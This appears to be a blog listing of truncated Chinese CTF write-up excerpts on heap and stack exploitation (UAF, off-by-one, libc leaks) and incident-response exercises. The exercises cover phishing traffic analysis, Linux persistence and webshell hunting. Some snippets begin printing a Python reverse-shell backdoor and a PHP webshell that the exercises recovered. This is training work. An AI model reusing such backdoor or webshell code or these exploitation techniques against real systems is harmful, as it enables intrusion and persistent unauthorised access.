[*] '/home/bamuwe/fastfastfast/vuln' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x3fd000) $ checksec ./...

int __fastcall main(int argc, const char **argv, const char **envp) { char buf[10]; // [rsp+6h] [rbp-Ah] BYREF setbuf(stdin, 0LL); setbuf(stderr, 0LL); setbuf(stdout, 0LL); mprotect((&am...

流量特征分析-小王公司收到的钓鱼邮件 一,下载数据包文件 hacker1.pacapng，分析恶意程序访问了内嵌 URL 获取了 zip 压缩包，该 URL 是什么将该 URL作为 FLAG 提交 FLAG（形式：flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}） (无需 http、https)； 找到压缩包流量 flag{http://tsdan...

权限维持-linux权限维持-隐藏 一,黑客隐藏的隐藏的文件 完整路径md5 发现/tmp下存在可疑的.temp文件 #!/usr/bin/python3 import socket,subprocess,os,sys, time pidrg = os.fork() if pidrg > 0: sys.exit(0) os.chdir("/") os.set...

第一章 应急响应-webshell查杀 查杀方法1:d盾查杀 查杀方法2:grep -nr “eval” .` 一,黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode...

UAF UAF leak_libc leak_heap_base 指针加密 unsortedbin one_gadget [*] '/home/bamuwe/duck/pwn' Arch: amd64-64-little RELRO: Full RELRO Sta...

[NISACTF 2022]UAF pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=85bd87e16a35c0c05064a1a0938...

[HNCTF 2022 WEEK4]ezheap [*] '/home/bamuwe/ezheap/ezheap' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ...

[BUUCTF]hitcontraining_heapcreator UAF Off-By-One 堆溢出 对应libc版本libc6_2.23-0ubuntu9_amd64 [*] '/home/bamuwe/heapcreator/heapcreator' Arch: amd64-64-litt...

所谓UAF漏洞是指程序在运行时通过悬空指针(悬空指针是指仍然指向已被释放内存空间的指针)访问已经被释放的内存. bamuwe@bamuwe:~/YDSneedGirlfriend$ ldd girlfriend linux-vdso.so.1 (0x00007ffd09fec000) /home/bamuwe/pwn_tools/glibc-all-in-o...